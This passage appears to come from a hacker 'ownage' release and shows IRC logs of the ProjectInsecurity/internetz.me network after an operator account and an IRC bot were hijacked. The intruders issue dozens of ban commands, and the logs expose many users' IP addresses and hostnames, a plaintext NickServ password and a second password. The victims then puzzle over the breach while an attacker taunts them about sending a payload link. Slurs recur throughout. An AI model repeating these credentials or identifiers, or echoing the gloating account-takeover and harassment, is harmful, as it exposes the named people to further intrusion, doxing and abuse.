crack. The heat death of █ universe would happening first, but skids not thinking that far. █ █ * Now talking on #priv8 █ * Topic for #priv8 is: SuPeR SeCrEt █ * Topic for #priv8 set by MLT (Sun Jun 4 08:33:14 2017) █ * danK sets mode +a on #priv8 MLT █ * danK gives channel operator status to MLT █ OPER OVERRIDE: danK █ (POTENT@ec2-34-210-28-112.us-west-2.compute.amazonaws.com) MODE #priv8 +ao █ MLT MLT █ .gline dirty █ Added gline for dirty r.i.p █ (User) exiting : at aussie.insecurity.zone: █ dirty!dirty@crownemirates.bid (User has been permanently banned from █ ProjectInsecurity (no reason)) █ .gline fuzion █ Added gline for fuzion r.i.p █ .gline fuzi0n █ Added gline for fuzi0n r.i.p █ (User) exiting : at fsociety.internetz.me: █ FuZi0N!FuZi0N@162.248.73.100 (User has been permanently banned from █ internetz.me (no reason)) █ .gline lola █ Added gline for lola r.i.p █ (User) exiting : at aussie.insecurity.zone: █ lola!lola@zyzz10.isla.moe (User has been permanently banned from █ ProjectInsecurity (no reason)) █ (User) exiting : at fsociety.internetz.me: █ catsik!catsik@zyzz10.isla.moe (User has been permanently banned from █ internetz.me (no reason)) █ .gline RMS █ Added gline for RMS r.i.p █ (User) exiting : at fsociety.internetz.me: RMS!r1ch4rd@91.92.136.64 █ (User has been permanently banned from internetz.me █ (no reason)) █ .gline Nux █ Added gline for Nux r.i.p █ (User) exiting : at fsociety.internetz.me: Nux!nux@skidstain.com █ (User has been permanently banned from internetz.me █ (no reason)) █ .gline syn4pse █ Added gline for syn4pse r.i.p █ (User) exiting : at fsociety.internetz.me: █ loeken!loeken@u.internetz.me (User has been permanently banned from █ internetz.me (no reason)) █ (User) exiting : at fsociety.internetz.me: █ syn4pse!syn@u.internetz.me (User has been permanently banned from █ internetz.me (no reason)) █ (User) exiting : at fsociety.internetz.me: █ [internetz|me|u]!ime@u.internetz.me (User has been permanently banned █ from internetz.me (no reason)) █ (User) exiting : at aussie.insecurity.zone: █ syn4pse-!syninsec@u.internetz.me (User has been permanently banned from █ ProjectInsecurity (no reason)) █ .gline sxcurity █ Added gline for sxcurity r.i.p █ (User) exiting : at aussie.insecurity.zone: sxcurity!sxC@nullptr.cz █ (User has been permanently banned from ProjectInsecurity (no reason)) █ (User) exiting : at fsociety.internetz.me: bongrip_!a@nullptr.cz █ (User has been permanently banned from internetz.me (no reason)) █ (User) exiting : at fsociety.internetz.me: dab!2POTENT@nullptr.cz █ (User has been permanently banned from internetz.me (no reason)) █ (User) exiting : at fsociety.internetz.me: Zodiac!Zodiac@nullptr.cz █ (User has been permanently banned from internetz.me (no reason)) █ (User) exiting : at fsociety.internetz.me: bongrip-!a@nullptr.cz █ (User has been permanently banned from internetz.me (no reason)) █ .gline sniger █ Added gline for sniger r.i.p █ (User) exiting : at aussie.insecurity.zone: █ sniger!sniger@45.32.162.220 (User has been permanently banned from █ ProjectInsecurity (no reason)) █ (User) exiting : at fsociety.internetz.me: █ danC3!danC2@45.32.162.220 (User has been permanently banned from █ internetz.me (no reason)) █ .gline tables █ Added gline for tables r.i.p █ (User) exiting : at aussie.insecurity.zone: █ tables!tables@5.79.86.15 (User has been permanently banned from █ ProjectInsecurity (no reason)) █ .gline Bansh █ (User) connecting : at fsociety.internetz.me: loeken █ (loeken@p5DDC2C31.dip0.t-ipconnect.de) █ Added gline for Bansh r.i.p █ (User) exiting : at aussie.insecurity.zone: █ Bansh!r00t@tor.thd.ninja (User has been permanently banned from █ ProjectInsecurity (no reason)) █ (User) connecting : at aussie.insecurity.zone: tables █ (tables@marylou.nos-oignons.net) █ NickServ: tables!tables@marylou.nos-oignons.net identified for nick █ tables. █ .gline Derp █ Added gline for Derp r.i.p █ (User) exiting : at aussie.insecurity.zone: Derp!Derp@194.88.143.66 █ (User has been permanently banned from ProjectInsecurity (no reason)) █ .gline vein █ Added gline for vein r.i.p █ (User) exiting : at fsociety.internetz.me: █ vein!Amaterasu@ec2-52-42-196-254.us-west-2.compute.amazonaws.com █ (User has been permanently banned from internetz.me (no reason)) █ .gline dab █ Added gline for dab r.i.p █ .gline FSB █ Sorry komrade █ Added gline for FSB r.i.p █ (User) connecting : at aussie.insecurity.zone: Derp █ (Derp@tor00.telenet.unc.edu) █ (User) exiting : at aussie.insecurity.zone: FSB!efSB@95.215.47.208 █ (User has been permanently banned from ProjectInsecurity (no reason)) █ .gline Alyssa █ Added gline for Alyssa r.i.p █ (User) exiting : at fsociety.internetz.me: █ skooch!sid3163@brockwell.irccloud.com (User has been permanently banned █ frominternetz.me (no reason)) █ (User) exiting : at aussie.insecurity.zone: █ Alyssa!sid226984@brockwell.irccloud.com (User has been permanently banned █ from ProjectInsecurity (no reason)) █ .gline peanuter █ Added gline for peanuter r.i.p █ (User) exiting : at aussie.insecurity.zone: █ peanuter!peanuter@80.82.77.240 (User has been permanently banned from █ ProjectInsecurity (no reason)) █ .gline ma0u █ Added gline for ma0u r.i.p █ (User) exiting : at fsociety.internetz.me: ma0u!fr0zn@45.63.41.227 █ (User has been permanently banned from internetz.me (no reason)) █ .gline anniesbbs █ Added gline for anniesbbs r.i.p █ (User) exiting : at fsociety.internetz.me: █ anniesbbs!anniesbbs@185.21.216.195 (User has been permanently banned from █ internetz.me (no reason)) █ .gline dyingbreed █ GLOBAL OPS: -- from OperServ: loeken is now an IRC operator. █ Added gline for dyingbreed r.i.p █ (User) connecting : at aussie.insecurity.zone: dirty █ (dirty@tor00.telenet.unc.edu) █ (User) exiting : dyingbreed (x@0s3x.internetz.me) [User has been █ permanently banned from HackTimes (no reason)] █ (User) exiting : at fsociety.internetz.me: █ Southern_B|tch!NoneYa@0s3x.internetz.me (User has been permanently banned █ from internetz.me (no reason)) █ .gline loeken █ Added gline for loeken r.i.p █ (User) exiting : at fsociety.internetz.me: █ loeken!loeken@p5DDC2C31.dip0.t-ipconnect.de (User has been permanently █ banned from internetz.me (no reason)) █ .gline dirty █ Added gline for dirty r.i.p █ (User) exiting : at aussie.insecurity.zone: █ Derp!Derp@tor00.telenet.unc.edu (User has been permanently banned from █ ProjectInsecurity (no reason)) █ (User) exiting : at aussie.insecurity.zone: █ dirty!dirty@tor00.telenet.unc.edu (User has been permanently banned from █ ProjectInsecurity (no reason)) █ .gline ShadowBrokers █ Added gline for ShadowBrokers r.i.p █ (User) exiting : at aussie.insecurity.zone: █ ShadowBrokers!root@afainatl.com (User has been permanently banned from █ ProjectInsecurity (no reason)) █ .gline trentmicro █ Added gline for trentmicro r.i.p █ (User) exiting : at aussie.insecurity.zone: █ trentmicro!kayla@204.44.91.24 (User has been permanently banned from █ ProjectInsecurity (no reason)) █ (User) connecting : at fsociety.internetz.me: Bansh █ (r00t@163.172.217.50) █ (User) exiting : at fsociety.internetz.me: █ Bansh!r00t@163.172.217.50 (User is permanently banned (Tor exit server █ detected. See www.sectoor.de/tor.php?ip=163.172.217.50)) █ .gline xamfp █ Added gline for xamfp r.i.p █ (User) exiting : at fsociety.internetz.me: █ xamfp!xamfp@ec2-52-15-197-60.us-east-2.compute.amazonaws.com (User █ has been permanently banned from internetz.me (no reason)) █ .gline skooch █ Added gline for skooch r.i.p █ .gline cSmith █ Added gline for cSmith r.i.p █ (User) exiting : at aussie.insecurity.zone: █ cSmith!csmith@cynical.us (User has been permanently banned from █ ProjectInsecurity (no reason)) █ .gline deeboi █ Added gline for deeboi r.i.p █ (User) exiting : at fsociety.internetz.me: █ deeboi!deeboi@144.217.215.125 (User has been permanently banned █ from internetz.me (no reason)) █ .gline Darkness █ Added gline for Darkness r.i.p █ (User) exiting : at fsociety.internetz.me: █ Darkness!Darkness@185.153.198.117 (User has been permanently banned █ from internetz.me (no reason)) █ .gline nill █ Added gline for nill r.i.p █ (User) exiting : at fsociety.internetz.me: nill!n@198.251.80.206 █ (User has been permanently banned from internetz.me (no reason)) █ .gline mr_vile █ Added gline for mr_vile r.i.p █ (User) exiting : at fsociety.internetz.me: mr_vile!no@i.dontexi.st █ (User has been permanently banned from internetz.me (no reason)) █ .gline kurobeats █ Added gline for kurobeats r.i.p █ (User) exiting : at fsociety.internetz.me: █ kurobeats!Got@CPE-121-215-138-162.lnse1.wel.bigpond.net.au (User has been █ permanently banned from internetz.me (no reason)) █ .gline Derp █ Added gline for Derp r.i.p █ .gline FlappyCuck █ Added gline for FlappyCuck r.i.p █ (User) exiting : at fsociety.internetz.me: █ FlappyCuck!frinks@192.240.127.83 (User has been permanently banned from █ internetz.me (no reason)) █ (User) exiting : at aussie.insecurity.zone: █ smurgle!frinks@192.240.127.83 (User has been permanently banned from █ ProjectInsecurity (no reason)) █ .gline scope █ Added gline for scope r.i.p █ (User) exiting : at aussie.insecurity.zone: █ scope!deploy@ip180.ip-193-70-95.eu (User has been permanently banned from █ ProjectInsecurity (no reason)) █ .gline Nux_ █ Added gline for Nux_ r.i.p █ (User) exiting : at fsociety.internetz.me: Nux_!nux@45.76.37.141 █ (User has been permanently banned from internetz.me (no reason)) █ .gline v1tal █ Added gline for v1tal r.i.p █ (User) exiting : at fsociety.internetz.me: █ v1tal!buddy@bitcoinshell.mooo.com (User has been permanently banned from █ internetz.me (no reason)) █ .gline Teridax █ Added gline for Teridax r.i.p █ (User) exiting : at fsociety.internetz.me: █ Teridax!Teridax@teridax.com (User has been permanently banned from █ internetz.me (no reason)) █ .gline noproto █ Added gline for noproto r.i.p █ (User) exiting : at fsociety.internetz.me: █ noproto!noproto@104.236.220.65 (User has been permanently banned from █ internetz.me (no reason)) █ .gline w0ne █ Added gline for w0ne r.i.p █ (User) exiting : at fsociety.internetz.me: █ w0ne!w0ne@ec2-35-163-190-224.us-west-2.compute.amazonaws.com (User has been █ permanently banned from internetz.me (no reason)) █ .gline AHyGjl76Jhf53 █ Added gline for AHyGjl76Jhf53 r.i.p █ (User) exiting : at aussie.insecurity.zone: █ AHyGjl76Jhf53!AHyGjl76Jh@141.132.250.13 (User has been permanently banned █ from ProjectInsecurity (no reason)) █ .gline catsik █ Added gline for catsik r.i.p █ .gline Glaive █ Added gline for Glaive r.i.p █ (User) exiting : at fsociety.internetz.me: █ Glaive!Glaive@c-24-15-237-161.hsd1.il.comcast.net (User has been █ permanently banned from internetz.me (no reason)) █ .gline didi_ █ Added gline for didi_ r.i.p █ (User) exiting : at aussie.insecurity.zone: █ didi_!anona@82.192.95.120 (User has been permanently banned from █ ProjectInsecurity (no reason)) █ .gline tatootian █ Added gline for tatootian r.i.p █ (User) exiting : at fsociety.internetz.me: █ tatootian!p@ns501141.ip-192-99-5.net (User has been permanently banned █ from internetz.me (no reason)) █ .gline eight_bytes █ Added gline for eight_bytes r.i.p █ (User) exiting : at fsociety.internetz.me: █ eight_bytes!sid141403@192.184.10.9 (User has been permanently banned █ from internetz.me (no reason)) █ .gline psycho █ Added gline for psycho r.i.p █ (User) exiting : at fsociety.internetz.me: █ psycho!psycho@hammetjus.nl (User has been permanently banned from █ internetz.me (no reason)) █ .gline icyphox █ Added gline for icyphox r.i.p █ (User) exiting : at aussie.insecurity.zone: █ icyphox!icyphox@45.32.112.198 (User has been permanently banned from █ ProjectInsecurity (no reason)) █ .gline Salam █ Added gline for Salam r.i.p █ (User) exiting : at aussie.insecurity.zone: █ Salam!ric0@23.239.80.28 (User has been permanently banned from █ ProjectInsecurity (no reason)) █ (User) exiting : at fsociety.internetz.me: █ n0rdi!ric0@23.239.80.28 (User has been permanently banned from █ internetz.me (no reason)) █ (User) connecting : at fsociety.internetz.me: synk █ (loeken@eu.fr1.cdn.internetz.me) █ .gline rek █ Added gline for rek r.i.p █ (User) exiting : at fsociety.internetz.me: █ rek!r_e_k@46.102.152.118 (User has been permanently banned from █ internetz.me (no reason)) █ .gline pop █ Added gline for pop r.i.p █ .gline synk █ (User) exiting : at aussie.insecurity.zone: █ pop!lol@blackhat.cat (User has been permanently banned from █ ProjectInsecurity (no reason)) █ Added gline for synk r.i.p █ (User) exiting : at fsociety.internetz.me: █ synk!loeken@eu.fr1.cdn.internetz.me (User has been permanently banned █ from internetz.me (no reason)) █ .gline syn4pse- █ Added gline for syn4pse- r.i.p █ (User) connecting : at aussie.insecurity.zone: NS-DonaldL █ (NS-DonaldL@ip-90-2-52-196.nyc.us.northamericancoax.com) █ .gline smurgle █ Added gline for smurgle r.i.p █ .gline NS-DonaldL █ Added gline for NS-DonaldL r.i.p █ (User) exiting : at aussie.insecurity.zone: █ NS-DonaldL!NS-DonaldL@ip-90-2-52-196.nyc.us.northamericancoax.com █ (User has been permanently banned from ProjectInsecurity (no reason)) █ .gline rqu1_ █ Added gline for rqu1_ r.i.p █ (User) exiting : at aussie.insecurity.zone: █ rqu1!r@216.218.222.12 (User has been permanently banned from █ ProjectInsecurity (no reason)) █ (User) exiting : at aussie.insecurity.zone: █ rqu1_!r@216.218.222.12 (User has been permanently banned from █ ProjectInsecurity (no reason)) █ .gline Zodiac █ (User) connecting : at aussie.insecurity.zone: rqu1 █ (r@163.172.212.115) █ Added gline for Zodiac r.i.p █ (User) connecting : at aussie.insecurity.zone: rqu1_ █ (r@163.172.212.115) █ .gline rqu1_ █ Added gline for rqu1_ r.i.p █ (User) exiting : at aussie.insecurity.zone: █ rqu1!r@163.172.212.115 (User has been permanently banned from █ ProjectInsecurity (no reason)) █ (User) exiting : at aussie.insecurity.zone: █ rqu1_!r@163.172.212.115 (User has been permanently banned from █ ProjectInsecurity (no reason)) █ .gline Southern_B|tch █ Added gline for Southern_B|tch r.i.p █ .gline BrownDowntown █ Added gline for BrownDowntown r.i.p █ (User) exiting : at aussie.insecurity.zone: █ BrownDowntown!bdt@212.92.104.143 (User has been permanently banned from █ ProjectInsecurity (no reason)) █ .gline Conflict █ Added gline for Conflict r.i.p █ (User) exiting : at fsociety.internetz.me: █ Conflict!Conflict@185.10.68.229 (User has been permanently banned from █ internetz.me (no reason)) █ (User) exiting : at fsociety.internetz.me: █ hipphopp!n@185.10.68.229 (User has been permanently banned from █ internetz.me (no reason)) █ .gline sipa █ Added gline for sipa r.i.p █ (User) exiting : at fsociety.internetz.me: █ sipa!sipa@dsl-trebng11-54f90b-135.dhcp.inet.fi (User has been █ permanently banned from internetz.me (no reason)) █ .gline thom █ Added gline for thom r.i.p █ (User) exiting : at fsociety.internetz.me: thom!xD@haxx.pw (User █ has been permanently banned from internetz.me (no reason)) █ (User) exiting : at fsociety.internetz.me: lilwiz!lilwiz@haxx.pw █ (User has been permanently banned from internetz.me (no reason)) █ .gline krazed █ Added gline for krazed r.i.p █ (User) exiting : at aussie.insecurity.zone: █ krazed!admin@bigballs.club (User has been permanently banned from █ ProjectInsecurity (no reason)) █ .gline lola █ Added gline for lola r.i.p █ .gline ald0g █ Added gline for ald0g r.i.p █ (User) exiting : at aussie.insecurity.zone: █ ald0g!root@prawksi.relay.coldhak.com (User has been permanently banned from █ ProjectInsecurity (no reason)) █ .gline installgen2 █ Added gline for installgen2 r.i.p █ (User) exiting : at fsociety.internetz.me: █ installgen2!installgen@gen2.space (User has been permanently banned from █ internetz.me (no reason)) █ .gline pezzer █ Added gline for pezzer r.i.p █ (User) exiting : at aussie.insecurity.zone: █ pezzer!pezzer@144.202.228.211 (User has been permanently banned from █ ProjectInsecurity (no reason)) █ (User) connecting : at aussie.insecurity.zone: ald0g █ (root@185.170.41.8) █ .gline ald0g █ Added gline for ald0g r.i.p █ (User) exiting : at aussie.insecurity.zone: ald0g!root@185.170.41.8 █ (User has been permanently banned from ProjectInsecurity (no reason)) █ .gline gibbz █ Added gline for gibbz r.i.p █ (User) exiting : at fsociety.internetz.me: █ gibbz!gibby@69.150.188.35.bc.googleusercontent.com (User has been █ permanently banned from internetz.me (no reason)) █ .gline Glaive █ (User) connecting : at fsociety.internetz.me: loeken █ (loeken@eu.fr2.cdn.internetz.me) █ Added gline for Glaive r.i.p █ .gline loeken █ Added gline for loeken r.i.p █ (User) exiting : at fsociety.internetz.me: █ loeken!loeken@eu.fr2.cdn.internetz.me (User has been permanently banned █ from internetz.me (no reason)) █ .gline sxcurity █ Added gline for sxcurity r.i.p █ .gline Jaq █ Added gline for Jaq r.i.p █ (User) exiting : at aussie.insecurity.zone: █ Jaq!No@pD952AAED.dip0.t-ipconnect.de (User has been permanently banned from █ ProjectInsecurity (no reason)) █ .gline tables █ Added gline for tables r.i.p █ (User) exiting : at aussie.insecurity.zone: █ tables!tables@marylou.nos-oignons.net (User has been permanently banned █ from ProjectInsecurity (no reason)) █ .gline c12 █ Added gline for c12 r.i.p █ (User) exiting : at aussie.insecurity.zone: █ c12!c12@politkovskaja.torservers.net (User has been permanently banned from █ ProjectInsecurity (no reason)) █ .gline herpez █ Added gline for herpez r.i.p █ (User) connecting : at aussie.insecurity.zone: notroot █ (toor@45.63.16.220) █ (User) connecting : at aussie.insecurity.zone: c12 █ (c12@91.223.82.156) █ .gline Withers █ Added gline for Withers r.i.p █ (User) exiting : at aussie.insecurity.zone: █ Withers!YUL@46.101.54.55 (User has been permanently banned from █ ProjectInsecurity (no reason)) █ .gline c12 █ Added gline for c12 r.i.p █ (User) exiting : at aussie.insecurity.zone: c12!c12@91.223.82.156 █ (User has been permanently banned from ProjectInsecurity (no reason)) █ .gline integrity █ Added gline for integrity r.i.p █ (User) exiting : at aussie.insecurity.zone: █ integrity!hello@gay-nigger-hitler.club (User has been permanently banned █ from ProjectInsecurity (no reason)) █ (User) connecting : at aussie.insecurity.zone: ma0u █ (umom@69.42.217.130) █ .gline ma0u █ Added gline for ma0u r.i.p █ (User) exiting : at aussie.insecurity.zone: ma0u!umom@69.42.217.130 █ (User has been permanently banned from ProjectInsecurity (no reason)) █ (User) connecting : at aussie.insecurity.zone: tables █ (tables@93.174.93.133) █ NickServ: tables!tables@93.174.93.133 identified for nick tables. █ .gline tables █ Added gline for tables r.i.p █ (User) exiting : at aussie.insecurity.zone: █ tables!tables@93.174.93.133 (User has been permanently banned from █ ProjectInsecurity (no reason)) █ .join #priv9 █ Joining #priv9. █ OPER OVERRIDE: danK █ (POTENT@ec2-34-210-28-112.us-west-2.compute.amazonaws.com) MODE #priv9 █ +ao MLT MLT █ ;) █ * danK has quit (aussie.insecurity.zone superb.undernix.net) █ * bongrip has quit (aussie.insecurity.zone superb.undernix.net) █ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ █ * You are now known as NickServ █ identify ISFATGtrajgvLix4b3hzNzdoMjU1MWB7X2p4!!@Lkkj8/.,xoxs77h2551`{_ █ jx █ ->MLT<- Password accepted, you are now recognized. █ IDENTIFY fuckyehbr0 █ ->bongrip-<- Password accepted, you are now recognized. █ ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ █ хихихи █ █ how is it even happening tho?? lol █ like this all began with defilers bot █ i understand how that happened █ the first time █ but █ i changed my pass █ for nickserv █ did 'MLT' ask you or defiler for a new oper pass in the past few days? █ ffs just use a fuckin bnc █ and be done with it █ yeah but how the fuck do they have my ns pass █ and get of that faggot webthing █ lol are none of the boxes pwned █ I'm pretty sure one of the boxes must be pwned █ Just going to drop this here.. █ identify MLT ISFATGtrajgvLix4b3hzNzdoMjU1MWB7X2p4!!@Lkkj8/. █ ,xoxs77h2551`{_jx █ ->MLT<- Password accepted, you are now recognized. █ and its not lola's he wioped everything █ rofl yep █ -!- NickServ [NickServ@privacy.internetz.me-F6EB07AA.east.us.northamericanco █ ax.com] has quit [User has been permanently banned from internetz.me (...)] █ wow █ WTF █ so um █ yours or defilers box == pwned █ I'm guessing █ lola did a full wipe on all of his shit █ and i don't even know if its re-linked █ Can someone pls pm me their jid? So i dont have to bother if things █ get even worse █ if anyone comes on here as me just tell them to post on @insecurity █ but clearly one of the boxes is pwned, lol █ post on it now █ just get a bnc █ keep the bnc online █ ok sec █ and dont use that fuckin webchat █ doesn't matter █ if they have all ns passes.. █ waiting for your tweet :P █ if one of ur boxes is pwned then what difference does that make █ tweeted █ tweet "FuZi0N is gawd" █ i just tweeted 'h' █ I'll most likely change it █ https://twitter.com/insecurity?lang=en █ ahh █ yes █ lang=en █ someone has one of the boxes hooked and i don't think it can be lola's █ (he wiped everything because defiler asked me to) █ doxed bro █ ooo sheiiit █ hmm █ .a █ mgay █ -!- like_our_danK_0day [NickServ@privacy.internetz.me-E8E7395.fr.amsterdamre █ sidential.com] has joined #insecurity █ So this happens if you stuff all hackers into one irc █ i need assistance, how do i get a CVE? █ Look at exploit-db █ -!- like_our_danK_0day [NickServ@privacy.internetz.me-E8E7395.fr.amsterdamre █ sidential.com] has quit [Killed (MLT (kys obese antifa furry retard lmfao))] █ yeah syn4pse- █ services are owned █ it would seem.. █ -!- ChanServ [services@undernix.net] has joined #insecurity █ -!- mode/#insecurity [+ao ChanServ ChanServ] by ChanServ █ -!- mode/#insecurity [+rQ] by ChanServ █ -!- ChanServ changed the topic of #insecurity to: .ProjectInsecurity || Gene █ ral tech-talk (keep it clean in here) || https://insecurity.zone/ || To enqu █ ire about joining our core team, then /query MLT || Join #barstool for chats █ on fleek. █ so my use of client wont rly make much of a difference if they got all █ ur ns passes anyway lol █ Can we unsafe login now? █ MLT █ u got rekt █ m8 █ ur pw to ur login █ <&FuZi0N> this is the insecurity zone guys █ At least he has choosen a safe password █ password1 ? █ its not robbie █ bongrip-: my pw was 60+ chars █ (22:53:36) &MLT: .gline tables █ (22:53:36) danK: Added gline for tables r.i.p █ (22:53:36) danK: (User) exiting : at aussie.insecurity.zone: tabl █ es!tables@ (User has been permanently banned from ProjectInsecurity (no reas █ on)) █ (22:55:23) &MLT: .sajoin █ (22:55:25) &MLT: .join █ (22:55:25) danK: Improper syntax. [Ex: !j <#chan>] █ (22:55:30) &MLT: .join #priv9 █ (22:55:30) danK: Joining #priv9. █ (22:55:33) danK: OPER OVERRIDE: danK (POTENT@) MODE #priv9 +ao ML █ T MLT █ (22:55:42) &MLT: ;) █ and used symbols etc █ ya █ someone got ur █ pw █ then █ nothing is hacked █ services == owned █ no █ services arent owned █ so they just █ they authed under you █ magicked a 60+ char pw that ive never used for anything else █ just you lel █ they opered on you █ outta nowhere? █ they cracked hash bro █ the md5 █ idk whats going on man █ idk how they got u █ so how'd they get the d5 █ but they got u █ md5** █ to begin with <- Wait. I thought you didn't use MD5? █ i dont think they ever got it tbh cause noboxes are compromised █ on my end █ they simply identified as you █ and glined with dank █ ok so they didnt get oper █ they didnt oper up █ i changed that pass █ today █ i set that pw today █ yea well █ and somehow they have the new one █ someone got ur ident pass █ that's 60+ chars █ cause u /msg'd nickserv █ how does that work lol █ on day █ one day █ time to reinstall winblows :p █ lmao █ Lol █ did you click on any fancy links lately :p █ musta been when services were gone █ someone /nicked nickserv █ got ur pass █ ya probably, i am running windows lmao █ He msgd an user █ u may never have changed it █ but █ someone definitely got ur pw █ i changed it todaya █ this morning █ <&FuZi0N> FYI never do /msg nickserv use /nickserv instead █ because someone was on my acc yesterday █ then they got my new pass █ ya i use //ns █ i use the alias █ given █ ya i should have did //ns lol █ rookie mistake █ tbh █ Lol █ <&FuZi0N> MLT ain't no rookie █ <&FuZi0N> he's a phenom █ Lol █ hrm █ fucking █ syn4pse- deleted my oper lol █ cause dank was on it █ and someone was going ham on ur account █ <&FuZi0N> yeah █ through your bot █ yea but █ <&FuZi0N> seperate dank and your olines █ they identified █ to mlt █ congrats █ <&FuZi0N> so we can isolate the issue next time █ once again team effort █ lol █ i mean lets look at the beginning entrance █ are u sure they haven't got another bug in dank?? █ nope █ positive █ 100% █ are u sanitizing everything now? or did u just sanitize UD? █ ah ok █ i loked at #noc █ they made dank join #priv9 █ and glined more ppl █ <&FuZi0N> hahah █ Loooooooo8888888 █ !user list █ fuck █ so to sum it up █ <&FuZi0N> but when i did .pwn mlt how were they still able to access dank? █ im the only oper who didnt fuck up compltely? █ lmao █ * syn4pse feels secure █ lol █ lol █ i don't see what i can be doing wrong (other than running windows) █ to be fair the sendraw wasnt shit █ <&FuZi0N> dirty and i were the IDS █ but lemme fix this █ inb4 they hit me w/ some browser 0day █ lol █ <&FuZi0N> then syn4pse- did the hacking █ because i have no idea █ how they could repeatedly obtain my ns pass █ if services weren't pwned █ they didnt have any real access █ can only mean I'm pwned @ client-side i guess █ MLT, thats why you dont fuckin open unknown links █ theres sandboxes █ well, i dont █ do that █ disposable vms █ so like █ etc for that sorta thing █ idk how this could have happened █ i htink they snagged ur pw █ the last time that shit happened █ <&FuZi0N> bongrip: .pwn cmd deletes access from dank right? █ these are the same people █ taht did it last time █ MLT █ theres no other way █ they got ur pw █ unless u truly are owned █ were u talking to 'MLT' on here in the past few days? █ which i highly doubt █ because its been them █ the entire time █ this is a classic case of SE █ and good organization █ and planning █ i haven't been on since Wednesday or thursday █ too bad theres no real skills behind them █ <&FuZi0N> bongrip: but when i did .pwn mlt how were they still able to acces █ s dank? █ they could do real damage █ this is a classic case of double face palm time █ they werent █ it was already done █ and u probably didnt have access █ if htey know how to use the box █ bot* █ yea tbh this is the first time anything of mine has ever been 'owned' █ lol █ they probably deleted my entire !user list █ and !nig list █ fuzi0n u probably dont even have access anymore █ time 2 retire dank :) █ i have to check and see what all theyve done █ nah █ dank is good █ its time for u nigs to █ <&FuZi0N> well i did the pwn cmd and the bot was banned but they just rejoin █ ed and started glining.... █ secure ur pw's █ then run it without an oline █ I still don't understand how they could obtain my nickserv pass █ after i changed it this morning █ ya ill run it w/out an oline █ doesnt need one █ thatll end everything █ <&FuZi0N> i think the box is popped █ no more anything █ no its not █ lol █ lur an idoit █ no box is popped █ <&FuZi0N> but then explain █ listen ill break it down to u █ listen █ listen █ slitsen █ ok █ these are the same guys █ rofl █ HERE IT COMES █ that did the .priv9 shit █ from urban dictionary █ sthe sendraw █ they still had mlt's password █ oh yea its definitely him █ lol █ fromn when all that shit happened █ they held onto it █ to do this again █ today █ they held it that long... █ when they couldh ave owned █ they've been on here for days █ shit █ were u speaking to 'MLT' past 3 days// █ yea but nmothing was leaked █ no █ i wasnt █ trust nothing was leaked █ ah █ im telling u █ they had ur password █ from last time █ shit happened █ <&FuZi0N> does mlt have oper or only oper via dank? █ he has oper █ so they would have used oper █ <&FuZi0N> ahh ok █ to own us █ instead of dank █ i have oper but not via dank █ if htey knew what they were doing █ and they don't have my oper pass █ ya █ just his nickserv pw █ they saved from the last skidmarks they put on the server █ yeah but █ i changed my ns pass █ today █ then this happens later today █ <&FuZi0N> Selling nickserv passwords for btc. PM bongrip for prices! █ <&FuZi0N> we can have another revenue stream guys █ what were u using █ what client mlt █ hoping not irccloud █ that shit is owned █ most webirc's are █ lol, have been using irccloud █ ill start using irssi again █ you havent heard about irccloud? █ um not other than some lame IP leak method █ digerati got his ass raped █ i fucked with a lot of people too for years █ until they publicly started showing that irccloud was owned █ like nubs █ ruined fun for everyone █ tbh █ <&bongrip> MLT █ <&bongrip> oh theres more than just ip leak █ <&bongrip> but anywho █ <&bongrip> thats just the low hanging fruit █ <&bongrip> no irccloud █ <&bongrip> the leeter people actually have real access █ <&bongrip> but dont say shit about it █ Bongrip, do you have jabber? █ um █ I'm trying to change my ns pass █ then after i do //ns set it tells me to re-identify █ and its not working w/ the pass i just changed it to █ lol █ -!- mode/#insecurity [-r] by ChanServ █ <&bongrip> re-register █ <&bongrip> ur account was fucked with █ <&bongrip> they logged in so █ <&bongrip> chances are they fucked with settings █ <&bongrip> :\ █ <&bongrip> id still wanna know their method of obtaining the pw █ <&bongrip> it had to have been nickserv but like █ <&bongrip> u said u changed it █ yeah i changed it early today █ like 12 hours ago █ then they had it again by the time i come back online.. █ <&bongrip> they dont have any other passwords █ <&bongrip> otherwise more damage would have been done █ so does that mean I'm pwned @ client-side █ or wut █ lol █ <&bongrip> nah ill wait till the real mlt comes on █ <&bongrip> oh wait nvm █ <&bongrip> rofl █ <&bongrip> cause opered █ <&bongrip> unless █ <&bongrip> theres a leak on that end of the server owners hand █ nah lol they don't have oper █ only me got oper █ i just dunno how they could repeatedly get a nickserv pass like that █ w/o anope 0day or smth █ <&bongrip> nah █ keylogger :) █ <&bongrip> im tellin u █ <&bongrip> theres something on ur end █ <&bongrip> lol █ <&bongrip> especially if u changed pw's █ <&bongrip> my box is not compromised █ <&bongrip> i just checked it out █ <&bongrip> i know syn4pse's is secure' we're good █ <&bongrip> idk man █ <&bongrip> the main point is █ <&bongrip> if you have to ask if you're owned █ <&bongrip> just assume it to be █ yeah I'm gonna wipe my os █ and install Linux tomorrow █ i can only assume ive been hit w/ something @ client-side █ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ █ 21:09 <~bongrip> MLT █ 21:09 <~bongrip> the mammoth has been poked <- Вот дерьмо █ ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ █ <+ghost> MLT: did you finish installing Linux? █ <~MLT> didnt start yet █ <+ghost> ok just let us know the uname -a when you're done so we can tailor █ the payload for the next link we send you █ <~syn4pse> lol █ <~bongrip> ghost █ <~bongrip> come at me little pup █ <~bongrip> who r u bb █ <+ghost> nobody cares about your shitty irc bot █ <~bongrip> what type of payload are we talking sweetherat █ <~bongrip> yea bro thats a hobby dont limit me to what i 